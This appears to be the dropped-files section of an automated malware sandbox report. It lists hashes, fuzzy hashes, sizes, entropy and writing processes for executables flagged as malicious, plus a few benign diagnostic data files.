                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A1A441EEA47D27CFFA1380B212699472
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AF1A5D1DC6C9AF6F993EC37DFE9FFD119A65CC95
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A5E061682C50D572618DDEB6BA504DCBEDCD7B1DA8B196FE108F0B34DE35587D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BDDAE8A570549B0BBB6D58D6994F4C56566E816D6DADA4474861099561C92FBFB76C91F2AEB2CF753CE72D2172AA1D8BED1731A5327288409CD144A1A784D835
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.288947144941643
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:jkdpSI+K3S/GWei+qNv2uG39sqjnhMgeiCl7G0nehbGZpbD:j6SIGGWei2uG3hDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:82E1FBAFE5AE9628723F49D8C572AFBC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:16DA6A53B060EFD586A8D9B5ED8F5A1E59D91225
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A2D3A777413894CC9A9AACB397055507C1A75AE26F9470783D34D93D330455AA
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8CD6A1946FCB3FFDC1C3AAE3505B859FB3FF7C5434B87B18F46F56D87AFB71ACE2D8EC0D05D729BA614CC1470A905347DC61F55D1AAA11D13F55C0B88A9FE089
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1141248
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.017485008960269
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:MaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:MasqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1668426D4049F247816A6509230B04D6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8BB2110AFA4F9506CF8A3CF8538303502EFAAB3D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4C5AC7B2E5F6828640C7829652A8E187BA2241972E22BF02919524ABEC2AA5FF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD9AC24E1FD1EAAC9855EAFFDB631DF0A7ED14EF4E87302589C90EF4873F7A1BC599F0973CDBD182F7EFC5920EE3DFD6E13344979C408A68C541E86317AA2519
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3225260236830921
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:5daAXl8ta/k/uMclF6vMclFq5zwAz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+GEAXn:Pl80kqF69Fq5z06CzE5Z2+fqjFIn
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:074A0456AFAD4CC6DB43629BB4285746
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:883CEB9CEE47E0E05F79F2FE17AF5A276ACEA012
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:739894D3F72A72FD9FBC4CA9EF4DC46E5E9B1AB76BC97537EF7489FDD775C4E9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:94DAC5B312853BE1D015664480034FD467802B7D3D8FBE7972EFF7EEA36C72431B34E91B6F734FBB177284FF2A63881DC612252AE9AB3E6CF78526209B2EDCA1
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1511424
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2228854271889125
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:MObHA4LWOsvAYFTVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:xjL3UTVsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:528551BC5915FF99C29746E159C1E483
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A521FC2A5E03CBD54A6009DFA93441E11F18573E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D02DD3D4DA0497D22CF5F7552F41E2C78FB018B4D188E33AA74AE1B855336131
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:365429B788DC7FD1F15EDB193C5D7A6FF0EEE2C4AE290F45864706C9D5B685CFC7DEBFD4F3893EEE9FB02E88313142699616AFD1C54E8D81DBB85467BF21C7A3
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1235968
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.182167075831855
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:CpFtQOZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:hOZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8A50E57282AB78C6D3930BA31E2E66D7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:080091BDBBB131060603C7AC0B7CC2CFC615343E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EC384659FFB85194486FBC0FC258261764D45F508F58EDE4AFCB9F98BFF901A0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:269C19731568E1A20BD4A74AE301FAC75E65E006EAA78719F12C0884639EED0763137983981A58DB6B65810723D5EBEBFB5579470AF0B602753D7F363A02B038
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.102373059133159
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Q3frCoQItLsiLPLe24CxruW4bIhllVsqjnhMgeiCl7G0nehbGZpbD:Q3fzsIPLkCNuVbIhDJDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FDA59EBB33AFC8972ABEB2B19C0D0FF0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DEA9316873F30FAB9EC64F870669B68DE6E92D45
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D3B13FCCEAD20DCA860BACA647838FE3F6C11423E47FCF5AD0E51AD647151F47
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:29C580EBF2859FC4AF52A7627AEDB5C153ED7E9D8FC0911E65BF4B5F86F006160AD683BC6DB504ED3DFA7C8742818DF47390400EA74F13C2873ECC25BE0ACA5A
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1846784
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.939440308162455
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:aW6BApg2YuyuNDYTabvcRvNYf8km1YsqjnhMgeiCl7G0nehbGZpbD:aF2YuHNETovcvNYf8kmaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:39A4234D5B8BA6534DB70A8421277A62
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:21872F31A7B5D46FA47262137C1AA633281B4B0E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1D19C58AD9011632264A84A1FD14ED31223DD43B9894C5C5F442A2E90A3D1932
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A62DC5071E0E828FF8C8E276CBCA81894E890C45D84D4C9AAEF538A69E9EFAC0619E9EA5FA1B86FA34E3150A30F6CA04D173DD369D312167548F65AC0FE259C9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1455616
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.238868443222417
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:PiW6ZvAKF5i/dN9Bdexj9Trk+FZsqjnhMgeiCl7G0nehbGZpbD:PYxF50b9Bdm9TxzDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B90A4BF24B298B6114E19987A67C9450
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9F7639D632B86BB2D871E399C53CD72CC7A69AF7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B88F1B446187B988B883C90436A43BF8E2E53B6C02F4A723DF3777C73C8DD5A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9E0FE69CB254DD5FB3C7750520C3D85AF82C5E78046CDE1B59FA02612DA3C19E7A81764DCE760E166847943A87F7DEFF0F720BCD41EC215BACEE96DE737F8490
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1455616
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.47657061842135
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:/JnJ5D3WYssqjnhMgeiCl7G0nehbGZpbD:/JnJ5DGYYDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:022EEAB6B3A6A0E570E90A480C9C1AEB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A86D6AFC89D1D4FFA7A7905B0AF8BDE00BEB9B96
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:49A051A6C275C301377AA5FBBF8A9805322389A1C484B5663F436DF387EDDC18
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C87E59D1FC46429E36532E3AAE79B9F3C5BA83B9C4122F5E87B4BB9BE5E8AD3BD2B185A77E3C07053D3F3C54200DB8EA5D1CE20B7C94DF24D37AA92681324A3C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2075136
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.736562685902467
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:CPK86JYTerDjfJ2313e1mP1MdnUHDmg27RnWGj:YD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4987C6F5CE15189BC89A214D481DE124
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:02CB9C9E40B81BE62394862624602937BF42C3AF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FCE918F2481A0C1020D1895562255598519768CF922C76041FBA053DC3B39500
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:837125895186EE239CF1298E4A1C2A0B0F45E3F0AD9AC4C4A7FA2C9A4549FF60A4EF2DFA5093510142D039424F33FAAB0A2A9149B6B68975CF46FFFD6AFB587F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.163278369812904
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:iEP3R6wXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:h6wsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D599A0860A654A2D629A56D388C66FA
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2F0B147F6EFB4C4F5E92252895FBAEA60D34EB45
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:25E62CAAA71B807F5F942766697F66537566066F4BF80104C7B1E02598153464
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9620FB4C1A0819C652A525BED252147DBBFA57E7E0D036A3C5308976468BDE8A2ADDDB5A6E39A318C09766E19E0848FD249577645F90556D872BDA842CE5924F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9832319607304445
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:DxU6s038BV9gvOque+nitNfxSvV1+riKJo2f6wqdltiNaJAnAhJSGq3prcAhCmD:+PtZiqLqSw0nKaeAhk6ry
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AD4F1C05505A2CDDDF191AA68A8099BE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8005FC381A9FED378DB6FC61A1C8B2FA040C81F2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7F500830F5323CD73CE407C6C0BD2BDD25EFA2F151794E149AE1B8CBFD9C6F30
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5FF1A7AFBF887856AADA76D323B721E91C539A527CAD9009D5BEA89AC4A69C18193FE05DA24AE9D99A9FBA7E43F67ACAFE96A227FB0FD059AAAFFB70EE4B42D0
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1278464
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.142947191020223
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:fjky/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fIy/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:80FB2A9AB41BBA2E660763723BD5C683
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:081D418C782F222A93B75445714C95B672D315D0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BCA54D5B6A32CBE9E67CBBA310FBE2D8BBB7D4BF1F978D7187F08619A9AB8B3B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:64FA5CB76EC53189975009779D07D1D0B3FA7F6CF6C0CFBBDD1DA862571BC068D8965FBDA12FF9791CCAB52EC27619D8EC8A4E6322E6A44A3123062028F6C18B
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1199616
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.083847920806543
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:k4DVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:bVsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:41907E0ED9E79ACAC7D2B8B28F36CD56
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:671EF12F6A98807B5E710E086C6812319D44AF86
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C5504F0660886CD7561DF68D0E9BFE8213A79063413587796E19CD2B1FBC7670
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:89BAB61A787BF1BE89AAC066CB61FED8D23E15107DD8A7881C29BCFD6A96C2238CF8374D5AF9AFDC20CF22626368553D974C61A3C5AC0A9BC961D2CE8B5EE2DA
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1146880
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.027541443591772
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:I9pXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+psqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:77032644518A6E344DB3C45614BB3462
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B981F4BECA4EF22D82D3CFF736C74EF8B5BC7F86
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4B88C34A9061EA3A076B629204DB5943DB43A96695F8B1F3733B30CAE55B7104
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7808984A10F47421CB91C0A8B34181FD0FD827D1D926ED009E5554CBE6CC1F4C04C0597A842FCD790FDAAD113E257EC4E54204E235B89B751D99BE96E26D82E3
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:modified
Size (bytes):5161984
Entropy (8bit):7.25697813924847
Encrypted:false
SSDEEP:98304:iCLZqizFGeZV8ppBcq+NFabvy5FEz9AGkn7D527BWG:BLDzFGmVWQq+NFarCFUIn7VQBWG
MD5:2D7D8B9B8EBC3FD8E18A4B4F0032889D
SHA1:96A2EDC0BAE41970401B49E44487F31761310A87
SHA-256:A6AC8E891E1878065B84347DC38353D4FE064C57A2C3620379101A305C562A0A
SHA-512:4135212440D2AD97D6881AA094DEA293B58C2EF511D48B8CADC5519586F14C97088B4B89234801F89C5E7A116BEAC7E891158DCE5F038149177A80EEDA976032
Malicious:true
Reputation:unknown
Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1303552
Entropy (8bit):7.171549992264214
Encrypted:false
SSDEEP:24576:5Z0FxT1UoYr99GdcpKAsqjnhMgeiCl7G0nehbGZpbD:nwWc8Dmg27RnWGj
MD5:FD669AD0BA373802EC20BC543357973C
SHA1:A0EAB5A9E2AE95F77C3A1CF5BCF6A4A55720F1DE
SHA-256:F6F3A48E1B663306B1BE692FEF7C251A45022EA6E6727D879677DEA99B3AA694
SHA-512:438D6E58CEDDC3886F6DCA7C3D1D54F0824C58E35054B7236522614454A3925A7C753BBD848E862C64B975CCF6D9937A5E87F9FECFB7A698EEE8053526C2498C
Malicious:true
Reputation:unknown
Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1339392
Entropy (8bit):5.269265325153089
Encrypted:false
SSDEEP:12288:fyoKo2fRple9pnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:fyocJApnsqjnhMgeiCl7G0nehbGZpbD
MD5:E53A74818C63CB6204FD0B777E635867
SHA1:D66F85A3E2CBB30941C23BB5B8FA6B4FA22490F9
SHA-256:B4D6255F0E004E3062C7CC0DAFCA2CFE7FC2190FF549A4C96504C18C37346895
SHA-512:FCCBC30380ED622FF4BB5ADFA32F6C13CA382FFB878BAAAB0A944BAB363C6A791DE1D5472C4B4FBA29148987D5FE64B47BA528EB9B1BDC8F18D7E072E1595181
Malicious:true
Reputation:unknown
Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2164736
Entropy (8bit):7.062033530841207
Encrypted:false
SSDEEP:49152:KWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKnDmg27RnWGj:M0zuNIbD527BWG
MD5:C9F70CE234FCA9526C1C5BFCDAF44E2B
SHA1:73A398ED2D2771F347EAA1482F709C383CCE8567
SHA-256:4982E00F483E77C694E7A15071846C5570EA1D1C422864AB440A23B82A712F85
SHA-512:693BA20F91C3FAA43B4808440CA52023BD35AE57EDDE52B9F9D58BA2F7885A63C06D9479BBDBEDD8A8C73DA988B50AAB880B3D365D572DBE843AFC582A51E3AA
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09993063721293281
Encrypted:false
SSDEEP:6:sOPSK3l/k/uMclF6vMclFq5zwvHNOn+SkUeYDwDzymWDQPSzj:stKV/kqF69Fq5z0O+pawHym6rv
MD5:00591B88304ABB80892235F0C24F7592
SHA1:A3218DBBDC64CAA2814C83980FF1D0F0CF58655B
SHA-256:FFA26E5B8A1D364D80B03B7449997422E83C683A615E32087726A8F394D822D0
SHA-512:445D44F6195CAE3D9A3288F6F3CE527E8F15F10AA09517E0132F6821EF04FDF2855791A5050F35CFDC1886822F812BD2499DDE3A0DBE5440F02E6D124D0A4041
Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....`...`.......................................`...!....................................Dx....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O...........................H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P..........Dx....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.10151148916299792
Encrypted:false
SSDEEP:6:Vl6UkW1K3l/k/uMclF6vMclFq5zwCANMu3n+SkUeYDwDzyMPDokW1zb:Vl6UkCKV/kqF69Fq5zhwX+pawHyyokCn
MD5:E94BCC221CB64C69EC7904E7374AA481
SHA1:EB88DF3307DDEF1FFEC256DB0E0563022B62F2B6
SHA-256:0ACBD37B1E0BCF9282B350641C9DE65A2F9A9003060540E839B60F08FA79EC62
SHA-512:CCC758B236BCB6820131C9C07CA1CA3D0AD75875B812C519948710DD4D498BD2ED805D5C511E5D6FA693379FE07B25530CE7D04E06671F7DFC56D0B90E9F8321
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....h...h.......................................h...!.....................................Ex....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O...........................H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P...........Ex............................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09876442854763505
Encrypted:false
SSDEEP:6:utlwK3Nk/uMclF6vMclFq5zw0E+HNIn+SkUeYDwDzyFDowzr:uwK9kqF69Fq5zu+tI+pawHyx53
MD5:F17DF81028BF4539B048D46BFE54EB3A
SHA1:2F63D6352343C3DF183F98C04A1B8F7DF008408D
SHA-256:F5F07C1DAEE639108292D2DFA86514DCDE46A3619A39C76D066959EF320ACD55
SHA-512:7A2E4DF568E1E89FEE72C1796FA0D2E8421ACDBEC81D41746507CFEC645B860DF4FA430741E04F3D0DB7F53FFD206AF468A670BB7A6A11FA572FF1683326BE7C
Malicious:false
Reputation:unknown
